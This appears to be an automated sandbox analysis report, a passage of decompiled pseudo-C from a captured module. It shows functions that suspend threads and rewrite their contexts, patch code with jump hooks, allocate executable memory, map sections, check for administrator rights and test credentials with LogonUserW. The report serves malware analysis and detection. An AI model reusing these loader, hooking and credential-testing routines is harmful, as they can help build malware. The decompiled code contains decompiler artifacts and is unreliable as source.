						_t7 = "ly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x0
						return HeapFree(_t7, 0,  *_t13);
					}
					do {
						_t20 = E6ECAAE20(0x5a, 0,  *((intOrPtr*)( *_t13 + _t17 * 4)));
						_t22 = _t22 + 0xc;
						if(_t20 != 0) {
							NtResumeThread(_t20, 0);
							NtClose(_t20);
						}
						_t17 = _t17 + 1;
						_t5 =  &(_t13[2]); // 0xc30cc483
					} while (_t17 <  *_t5);
					goto L7;
				}
				return _t6;
			}

0x6ecab271
0x6ecab278
0x6ecab27b
0x6ecab280
0x6ecab2b0
0x6ecab2b2
0x00000000
0x6ecab2c1
0x6ecab283
0x6ecab292
0x6ecab294
0x6ecab299
0x6ecab29e
0x6ecab2a4
0x6ecab2a4
0x6ecab2a9
0x6ecab2aa
0x6ecab2aa
0x00000000
0x6ecab2af
0x6ecab2c3

APIs

HeapFree.KERNEL32(00000000,00000000,?,00000000,?,6ECAB44C,?,76D24970,00000000), ref: 6ECAB2BB

Part of subcall function 6ECAAE20: NtOpenThread.NTDLL ref: 6ECAAE72

NtResumeThread.NTDLL ref: 6ECAB29E
NtClose.NTDLL(00000000), ref: 6ECAB2A4

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$CloseFreeHeapOpenResume
String ID:
API String ID: 3496683721-0
Opcode ID: 2d17067cdd078ec5d34f64082065899c043bec2903c615e22dbe5cc156c27c78
Instruction ID: 1127cb086c61c7a5889682e3ab8e999461f48b8a6bb511d8faab724022b48d42
Opcode Fuzzy Hash: 2d17067cdd078ec5d34f64082065899c043bec2903c615e22dbe5cc156c27c78
Instruction Fuzzy Hash: 0BF05431641516AFDB118AD8CC91F9E33AAAFC5711F118255FB045F28DE770AC42DBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA3220, Relevance: 4.5, APIs: 3, Instructions: 35
memoryCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E6ECA3220(intOrPtr _a4) {
				short _v4;
				struct _SID_IDENTIFIER_AUTHORITY _v8;
				char _v12;
				void* _v16;
				PSID* _t19;

				_t19 =  &_v16;
				_v12 = 0;
				_v16 = 0;
				_v8.Value = 0;
				_v4 = 0x500;
				if(AllocateAndInitializeSid( &_v8, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t19) != 0) {
					__imp__CheckTokenMembership(_a4, _v16,  &_v12);
					FreeSid( *_t19);
				}
				return _v12;
			}

0x6eca3220
0x6eca323d
0x6eca3241
0x6eca3245
0x6eca3249
0x6eca3258
0x6eca3268
0x6eca3272
0x6eca3272
0x6eca327f

APIs

AllocateAndInitializeSid.ADVAPI32 ref: 6ECA3250
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 6ECA3268
FreeSid.ADVAPI32(00000000,?,?), ref: 6ECA3272

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: fe12a2db07c73f07d0d7c99e8fceb24f7210bd82655d7e86d932bece268ad7ad
Instruction ID: 01eead755f995b80d7b8f3a4538eea3b184fb50f39a11238f709e1062c3765ca
Opcode Fuzzy Hash: fe12a2db07c73f07d0d7c99e8fceb24f7210bd82655d7e86d932bece268ad7ad
Instruction Fuzzy Hash: 49F0A9B4618301AFE740EB68C989E2FB7F8EB88704F405D1DB995C3251E7709805CB56

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA5130, Relevance: 4.5, APIs: 3, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECA5130(WCHAR* _a4, WCHAR* _a8, WCHAR* _a12) {
				void* _v4;
				long _t16;
				int _t17;

				_t16 = 0;
				_v4 = 0;
				_t17 = LogonUserW(_a4, _a8, _a12, 2, 0,  &_v4);
				if(_t17 != 0 || GetLastError() == 0x52f) {
					_t16 = 1;
					if(_t17 != 0) {
						CloseHandle(_v4);
					}
				}
				return _t16;
			}

0x6eca5144
0x6eca514c
0x6eca5156
0x6eca515a
0x6eca5169
0x6eca5170
0x6eca5177
0x6eca5177
0x6eca5170
0x6eca5182

APIs

LogonUserW.ADVAPI32(00CD21B8,00CD21B8,6ECA96ED,00000002,00000000,00CD3FB0), ref: 6ECA5150
GetLastError.KERNEL32 ref: 6ECA515C
CloseHandle.KERNEL32(?), ref: 6ECA5177

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseErrorHandleLastLogonUser
String ID:
API String ID: 917161313-0
Opcode ID: 18d8d15fc646d9575c9fe46d24796278c87ee75c64534e6aab103610feb92b90
Instruction ID: fe2abbcc3ff04fbc2b3b0b5c85f66ff4aa85ea99a25d1c7e281dd718e08b1775
Opcode Fuzzy Hash: 18d8d15fc646d9575c9fe46d24796278c87ee75c64534e6aab103610feb92b90
Instruction Fuzzy Hash: C1F05EB66046116BD2208B5CD948E6F7BBAEBC9751F018A18FA56C3244D730C801CB72

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA14E0, Relevance: 3.1, APIs: 2, Instructions: 88
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E6ECA14E0(signed int __eax) {
				void* _t23;
				intOrPtr _t30;
				void* _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr* _t38;
				intOrPtr _t41;
				signed int _t44;
				PVOID* _t48;
				signed int _t51;
				intOrPtr _t52;
				void* _t53;

				_t52 =  *((intOrPtr*)(_t53 + 0x10));
				_t34 =  *((intOrPtr*)(_t52 + 0x138));
				_t44 =  ~(__eax & 0x00000002);
				asm("sbb edi, edi");
				_t32 = 0;
				if(0 <  *(_t52 + 0x46)) {
					_t51 =  *(_t52 + 0x46) & 0x0000ffff;
					_t38 = _t34 + 0xc;
					do {
						_t41 =  *((intOrPtr*)(_t38 - 4));
						if(_t41 != 0) {
							_t30 =  *_t38;
							_t44 =  <  ? _t30 : _t44;
							_t31 = _t30 + _t41;
							if(_t31 > _t32) {
								_t32 = _t31;
							}
						}
						_t38 = _t38 + 0x28;
						_t51 = _t51 - 1;
					} while (_t51 != 0);
				}
				_t48 = _t52 + 0x148;
				_t33 = _t32 - _t44;
				 *((intOrPtr*)(_t53 + 0x30)) = _t33;
				 *_t48 =  *((intOrPtr*)(_t52 + 0x74)) + _t44;
				if(NtAllocateVirtualMemory(0xffffffff, _t48, 0, _t53 + 0x20, 0x3000, 0x40) < 0) {
					 *_t48 = 0;
				}
				_t23 =  *_t48;
				 *((intOrPtr*)(_t52 + 0x144)) =  *((intOrPtr*)(_t52 + 0x74));
				if(_t23 != 0) {
					L14:
					asm("sbb eax, eax");
					return ( ~_t23 & 0xfffffffd) + 3;
				} else {
					if(( *(_t52 + 0x56) & 0x00000001) == 0) {
						 *((intOrPtr*)(_t53 + 0x28)) = _t33;
						if(NtAllocateVirtualMemory(0xffffffff, _t48, 0, _t53 + 0x18, 0x3000, 0x40) < 0) {
							 *_t48 = 0;
						}
						_t23 =  *_t48;
						 *((intOrPtr*)(_t52 + 0x144)) = _t23 - _t44;
						goto L14;
					} else {
						return 4;
					}
				}
			}

0x6eca14e3
0x6eca14e7
0x6eca14f4
0x6eca14f6
0x6eca14fa
0x6eca1500
0x6eca1502
0x6eca1506
0x6eca1510
0x6eca1510
0x6eca1515
0x6eca1517
0x6eca151b
0x6eca151e
0x6eca1522
0x6eca1524
0x6eca1524
0x6eca1522
0x6eca1526
0x6eca1529
0x6eca1529
0x6eca1510
0x6eca153d
0x6eca1546
0x6eca154a
0x6eca154e
0x6eca1557
0x6eca1559
0x6eca1559
0x6eca155f
0x6eca1564
0x6eca156c
0x6eca15af
0x6eca15b2
0x6eca15be
0x6eca156e
0x6eca1572
0x6eca1590
0x6eca159b
0x6eca159d
0x6eca159d
0x6eca15a3
0x6eca15a9
0x00000000
0x6eca1574
0x6eca157e
0x6eca157e
0x6eca1572

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 6ECA1550
NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 6ECA1594

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 5b0b043d6e822b136531f3b0edcb56b7ef08a311160dc5b74ff0e4c30d987e9f
Instruction ID: dd412d66e1b9f8e2a29d4cd5ace69a63b07d67951ee807d408baa95023978dc7
Opcode Fuzzy Hash: 5b0b043d6e822b136531f3b0edcb56b7ef08a311160dc5b74ff0e4c30d987e9f
Instruction Fuzzy Hash: 1B21AEB22542465BE724DEADCC90BEA77EAEF80324F20062DEB65CB2C0E771D5448784

Uniqueness

Uniqueness Score: -1.00%

Function 6ECAB2D0, Relevance: 3.1, APIs: 2, Instructions: 81
nativeCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E6ECAB2D0(signed int __eax, intOrPtr _a4) {
				char _v4;
				char _v16;
				signed int _v20;
				void* _t46;
				void** _t49;

				_t49 = __eax * 0x2c +  *0x6ecb0950;
				_t46 =  *_t49;
				_t50 = 5;
				if((_t49[5] & 0x00000001) != 0) {
					_t46 = _t46 - 5;
					_t50 = 7;
				}
				if(E6ECAADE0(_t46, _t50, 0x40,  &_v4) != 0) {
					if(_a4 == 0) {
						if((_t49[5] & 0x00000001) == 0) {
							_push(5);
							_t15 =  &(_t49[3]); // -1858799940
						} else {
							_push(7);
							_t14 =  &(_t49[3]); // -1858799940
						}
						RtlMoveMemory(_t46, ??, ??);
					} else {
						 *_t46 = 0xe9;
						 *((intOrPtr*)(_t46 + 1)) = _t49[1] - _t46 - 5;
						if((_t49[5] & 0x00000001) != 0) {
							 *( *_t49) = 0xf9eb;
						}
					}
					E6ECAADE0(_t46, _t50, _v16,  &_v16);
					_push(_t50);
					_push(_t46);
					_push(0xffffffff);
					L6ECAC336();
					_t49[5] = ((_v20 & 0x00000001) + (_v20 & 0x00000001) | _t49[5] & 0x000000fd) & 0x000000fb | (_v20 & 0x00000001) + _t27 + (_v20 & 0x00000001) + _t27;
					return 0;
				} else {
					return 0xa;
				}
			}

0x6ecab2d8
0x6ecab2e3
0x6ecab2e5
0x6ecab2ea
0x6ecab2ec
0x6ecab2ee
0x6ecab2ee
0x6ecab306
0x6ecab317
0x6ecab33a
0x6ecab344
0x6ecab346
0x6ecab33c
0x6ecab33c
0x6ecab33e
0x6ecab341
0x6ecab34b
0x6ecab319
0x6ecab319
0x6ecab324
0x6ecab32b
0x6ecab32f
0x6ecab32f
0x6ecab32b
0x6ecab35c
0x6ecab364
0x6ecab365
0x6ecab366
0x6ecab368
0x6ecab389
0x6ecab391
0x6ecab30a
0x6ecab311
0x6ecab311

APIs

RtlMoveMemory.NTDLL(00000000,-6ECB0944,00000005), ref: 6ECAB34B
NtFlushInstructionCache.NTDLL(000000FF,00000000,00000005), ref: 6ECAB368

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: CacheFlushInstructionMemoryMove
String ID:
API String ID: 2209353252-0
Opcode ID: 75946ccbde3beefca18aa54d5d0949b17f9dee44706d4f413dee6ff97767df0f
Instruction ID: ab5b0bb44837a45490b6e3ebc989d62a22041541dbfe08885c69ef5fc6255106
Opcode Fuzzy Hash: 75946ccbde3beefca18aa54d5d0949b17f9dee44706d4f413dee6ff97767df0f
Instruction Fuzzy Hash: B321F53210534A6FD3218AADDD51BA7BBE8DB82724F154B0DE6A1476C5F722A409C3A2

Uniqueness

Uniqueness Score: -1.00%

Function 6ECAAFC0, Relevance: 3.1, APIs: 2, Instructions: 71
nativethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECAAFC0(signed int __eax, void* _a4, intOrPtr _a8) {
				void* _v0;
				long _v536;
				intOrPtr _v540;
				struct _CONTEXT _v716;
				struct _CONTEXT _v720;
				void* __edi;
				long _t16;
				intOrPtr _t19;
				long _t20;
				signed int _t27;
				void* _t30;
				intOrPtr _t32;
				long _t37;
				signed int _t39;
				void* _t40;
				intOrPtr _t41;

				_t41 = _a8;
				_t39 = __eax;
				_v716 = 0x10001;
				_t16 = NtGetContextThread(_a4,  &_v716);
				if(_t16 < 0) {
					L19:
					return _t16;
				}
				if(_t39 != 0xffffffff) {
					_t16 = _t39 + 1;
				} else {
					_t16 =  *0x6ecb0958; // 0x0
					_t39 = 0;
				}
				if(_t39 >= _t16) {
					goto L19;
				} else {
					_t27 = _t39 * 0x2c;
					_t37 = _v536;
					_t40 = _t16 - _t39;
					do {
						_t32 =  *0x6ecb0950; // 0x0
						_t19 = _t41;
						_t30 = _t27 + _t32;
						if(_t19 == 0) {
							_t20 = 0;
						} else {
							if(_t19 == 1) {
								_t20 = 1;
							} else {
								_t20 = ( *(_t30 + 0x14) & 0x000000ff) >> 0x00000002 & 0x00000001;
							}
						}
						if((( *(_t30 + 0x14) & 0x000000ff) >> 0x00000001 & 0x00000001) != _t20) {
							if(_t20 == 0) {
								_t20 = E6ECAAF50(_t30, _t37);
							} else {
								_t20 = E6ECAAF90(_t30, _t37);
							}
							if(_t20 != 0) {
								_v536 = _t20;
								_t20 = NtSetContextThread(_v0,  &_v720);
								_t37 = _v540;
							}
						}
						_t27 = _t27 + 0x2c;
						_t40 = _t40 - 1;
					} while (_t40 != 0);
					return _t20;
				}
			}

0x6ecaafce
0x6ecaafd6
0x6ecaafde
0x6ecaafe6
0x6ecaafed
0x6ecab099
0x6ecab099
0x6ecab099
0x6ecaaff6
0x6ecab001
0x6ecaaff8
0x6ecaaff8
0x6ecaaffd
0x6ecaaffd
0x6ecab006
0x00000000
0x6ecab00c
0x6ecab00f
0x6ecab015
0x6ecab01c
0x6ecab020
0x6ecab020
0x6ecab028
0x6ecab02b
0x6ecab02e
0x6ecab046
0x6ecab030
0x6ecab031
0x6ecab03f
0x6ecab033
0x6ecab03a
0x6ecab03a
0x6ecab031
0x6ecab053
0x6ecab057
0x6ecab060
0x6ecab059
0x6ecab059
0x6ecab059
0x6ecab067
0x6ecab070
0x6ecab07d
0x6ecab082
0x6ecab082
0x6ecab067
0x6ecab089
0x6ecab08c
0x6ecab08c
0x00000000
0x6ecab090

APIs

NtGetContextThread.NTDLL ref: 6ECAAFE6
NtSetContextThread.NTDLL ref: 6ECAB07D

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: dd1b42898cd233bf7c4d23448886f2646cd961462693ae00d1249fdc1acdf003
Instruction ID: f4228b7e20dfbd8c65413847b6bb294fc31b8ebef7941566883e5c81a8cfaacc
Opcode Fuzzy Hash: dd1b42898cd233bf7c4d23448886f2646cd961462693ae00d1249fdc1acdf003
Instruction Fuzzy Hash: B221DBB150435B4BD3709AED88807EBB7D9AB85350F40062AD674C714CF671D9458392

Uniqueness

Uniqueness Score: -1.00%

Function 6ECAB1F0, Relevance: 3.0, APIs: 2, Instructions: 42
nativethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECAB1F0(long** __eax, intOrPtr _a4) {
				signed int _v0;
				void* __esi;
				long _t10;
				signed int _t16;
				void* _t21;
				intOrPtr* _t23;
				void* _t24;

				_t23 = __eax;
				 *__eax = 0;
				__eax[1] = 0;
				__eax[2] = 0;
				_t10 = E6ECAB0A0(__eax);
				if( *_t23 != 0) {
					_t16 = 0;
					if( *((intOrPtr*)(_t23 + 8)) <= 0) {
						L7:
						return _t10;
					}
					do {
						_t10 = E6ECAAE20(0x5a, 0,  *((intOrPtr*)( *_t23 + _t16 * 4)));
						_t21 = _t10;
						_t24 = _t24 + 0xc;
						if(_t21 != 0) {
							NtSuspendThread(_t21, 0);
							E6ECAAFC0(_v0, _t21, _a4);
							_t24 = _t24 + 8;
							_t10 = NtClose(_t21);
						}
						_t16 = _t16 + 1;
					} while (_t16 <  *((intOrPtr*)(_t23 + 8)));
					goto L7;
				}
				return _t10;
			}

0x6ecab1f1
0x6ecab1f3
0x6ecab1f9
0x6ecab200
0x6ecab207
0x6ecab20f
0x6ecab212
0x6ecab217
0x6ecab25f
0x00000000
0x6ecab25f
0x6ecab220
0x6ecab22a
0x6ecab22f
0x6ecab231
0x6ecab236
0x6ecab23b
0x6ecab24a
0x6ecab24f
0x6ecab253
0x6ecab253
0x6ecab258
0x6ecab259
0x00000000
0x6ecab25e
0x6ecab261

APIs

Part of subcall function 6ECAB0A0: NtQuerySystemInformation.NTDLL ref: 6ECAB0B5
Part of subcall function 6ECAB0A0: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00000000), ref: 6ECAB0DB
Part of subcall function 6ECAB0A0: NtQuerySystemInformation.NTDLL ref: 6ECAB0FC
Part of subcall function 6ECAB0A0: GetCurrentProcessId.KERNEL32(?,00000000,00000005,00000000,000000FF,000000FF), ref: 6ECAB118
Part of subcall function 6ECAB0A0: GetCurrentThreadId.KERNEL32 ref: 6ECAB146
Part of subcall function 6ECAB0A0: HeapAlloc.KERNEL32(00000000,00000000,00000200), ref: 6ECAB16A
Part of subcall function 6ECAB0A0: VirtualFree.KERNEL32(00000000,000000FF,00008000,00000005,00000000,000000FF,000000FF), ref: 6ECAB1DB

Part of subcall function 6ECAAE20: NtOpenThread.NTDLL ref: 6ECAAE72

NtSuspendThread.NTDLL(00000000,00000000), ref: 6ECAB23B

Part of subcall function 6ECAAFC0: NtGetContextThread.NTDLL ref: 6ECAAFE6
Part of subcall function 6ECAAFC0: NtSetContextThread.NTDLL ref: 6ECAB07D

NtClose.NTDLL(00000000), ref: 6ECAB253

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$AllocContextCurrentInformationQuerySystemVirtual$CloseFreeHeapOpenProcessSuspend
String ID:
API String ID: 1213046356-0
Opcode ID: fc41af2628a402dc0e663f27d0976610eb69affcfda8df536d29c55f9b3c2c83
Instruction ID: 057b2656a9f58c91431ef0e499006aeae2c60760202d8e9e4bd9517c6cacb20d
Opcode Fuzzy Hash: fc41af2628a402dc0e663f27d0976610eb69affcfda8df536d29c55f9b3c2c83
Instruction Fuzzy Hash: F001817510020B5FD360CF98D8D0BAB73E9AFC4705F104A1DE6555B248F7746445C661

Uniqueness

Uniqueness Score: -1.00%

Function 6ECAAD39, Relevance: 1.6, APIs: 1, Instructions: 105
nativeCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E6ECAAD39(void* __eax, intOrPtr* __ebx, void* __ecx, intOrPtr* __edx, long _a4, long _a8, long _a12, long* _a16) {
				void* _v4;
				void* _t71;

				_t71 = __eax +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx;
				 *__ebx =  *__ebx + _t71;
				 *__ebx =  *__ebx + _t71 +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__edx;
				 *((intOrPtr*)(__ecx - 0x75)) =  *((intOrPtr*)(__ecx - 0x75)) + __edx;
				_push(__ecx);
				_v4 = _a4;
				_a4 = _a8;
				return 0 | NtProtectVirtualMemory(0xffffffff,  &_v4,  &_a4, _a12, _a16) > 0x00000000;
			}

0x6ecaadab
0x6ecaadad
0x6ecaadbf
0x6ecaaddf
0x6ecaade0
0x6ecaadee
0x6ecaadf7
0x6ecaae16

APIs

NtProtectVirtualMemory.NTDLL ref: 6ECAAE07

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: b4d77e731b5723b151f1067eb9d00d78f8638cf145a7724cd033c2e58dfa8113
Instruction ID: 027784726755196d9db7976355574b23ee220dc855b509b338acd059849fbc04
Opcode Fuzzy Hash: b4d77e731b5723b151f1067eb9d00d78f8638cf145a7724cd033c2e58dfa8113
Instruction Fuzzy Hash: ACF0FE761083519FC705CF58CC92E5A77E4AF9A710B148A5DE1A5C7684D730E414DB23

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA18D0, Relevance: 1.6, APIs: 1, Instructions: 56
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECA18D0(void* __edi) {
				void* _v4;
				long _v8;
				long _v12;
				intOrPtr _t18;
				signed int _t20;
				signed int _t22;
				long _t23;
				void* _t28;
				void* _t36;
				unsigned int* _t37;

				_t36 = __edi;
				_t18 =  *((intOrPtr*)(__edi + 0x138));
				_t28 = 0;
				if(0 >=  *((intOrPtr*)(__edi + 0x46))) {
					L13:
					return 0;
				} else {
					_t37 = _t18 + 0x24;
					do {
						_t20 =  *_t37;
						if((_t20 & 0x00000020) != 0) {
							 *_t37 = _t20 | 0x60000000;
						}
						_t22 =  *_t37 >> 0x1d;
						if(_t22 > 6) {
							L10:
							_t23 = 0x40;
						} else {
							switch( *((intOrPtr*)(_t22 * 4 +  &M6ECA1984))) {
								case 0:
									goto L11;
								case 1:
									_t23 = 0x10;
									goto L11;
								case 2:
									goto L11;
								case 3:
									goto L11;
								case 4:
									goto L10;
							}
						}
						L11:
						_v4 =  *((intOrPtr*)(_t37 - 0x18)) +  *((intOrPtr*)(_t36 + 0x144));
						_v12 = _t23;
						_v8 =  *((intOrPtr*)(_t37 - 0x1c));
						if(NtProtectVirtualMemory(0xffffffff,  &_v4,  &_v8, _t23,  &_v12) < 0) {
							return 9;
						} else {
							goto L12;
						}
						goto L15;
						L12:
						_t28 = _t28 + 1;
						_t37 =  &(_t37[0xa]);
					} while (_t28 < ( *(_t36 + 0x46) & 0x0000ffff));
					goto L13;
				}
				L15:
			}

0x6eca18d0
0x6eca18d0
0x6eca18dc
0x6eca18e3
0x6eca196f
0x6eca1975
0x6eca18e9
0x6eca18e9
0x6eca18f0
0x6eca18f0
0x6eca18f4
0x6eca18fb
0x6eca18fb
0x6eca18ff
0x6eca1905
0x6eca192a
0x6eca192a
0x6eca1907
0x6eca1907
0x00000000
0x00000000
0x00000000
0x6eca190e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6eca1907
0x6eca192f
0x6eca193b
0x6eca1945
0x6eca194d
0x6eca1960
0x6eca1980
0x00000000
0x00000000
0x00000000
0x00000000
0x6eca1962
0x6eca1966
0x6eca1967
0x6eca196a
0x00000000
0x6eca18f0
0x00000000

APIs

NtProtectVirtualMemory.NTDLL ref: 6ECA1959

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 6701af273ba216e04db1d8a6bc35617d4f7c451ce3d3430abdb91125383c4d5b
Instruction ID: 0079c24d0eb7ab2be348d3d346b944752fea07f1891fd1caa23ac116f06adc22
Opcode Fuzzy Hash: 6701af273ba216e04db1d8a6bc35617d4f7c451ce3d3430abdb91125383c4d5b
Instruction Fuzzy Hash: 081173B56082139FE724CFADD5907D6B3E6FB44310F004A2AEA9587240F774A94DCB92

Uniqueness

Uniqueness Score: -1.00%

Function 6ECAAE20, Relevance: 1.5, APIs: 1, Instructions: 31
nativethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECAAE20(long _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v4;
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				void* _v36;
				void** _t30;

				_t30 =  &_v36;
				_v36 = 0;
				_v24 = 0x18;
				_v20 = 0;
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				_v4 = 0;
				if(_a8 != 0) {
					_v12 = 2;
				}
				_v32 = 0;
				_v28 = _a12;
				_t18 = (0 | NtOpenThread( &_v36, _a4,  &_v24,  &_v32) < 0x00000000) - 1; // -1
				return _t18 &  *_t30;
			}

0x6ecaae20
0x6ecaae25
0x6ecaae28
0x6ecaae30
0x6ecaae34
0x6ecaae38
0x6ecaae3c
0x6ecaae40
0x6ecaae48
0x6ecaae4a
0x6ecaae4a
0x6ecaae52
0x6ecaae63
0x6ecaae7e
0x6ecaae87

APIs

NtOpenThread.NTDLL ref: 6ECAAE72

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

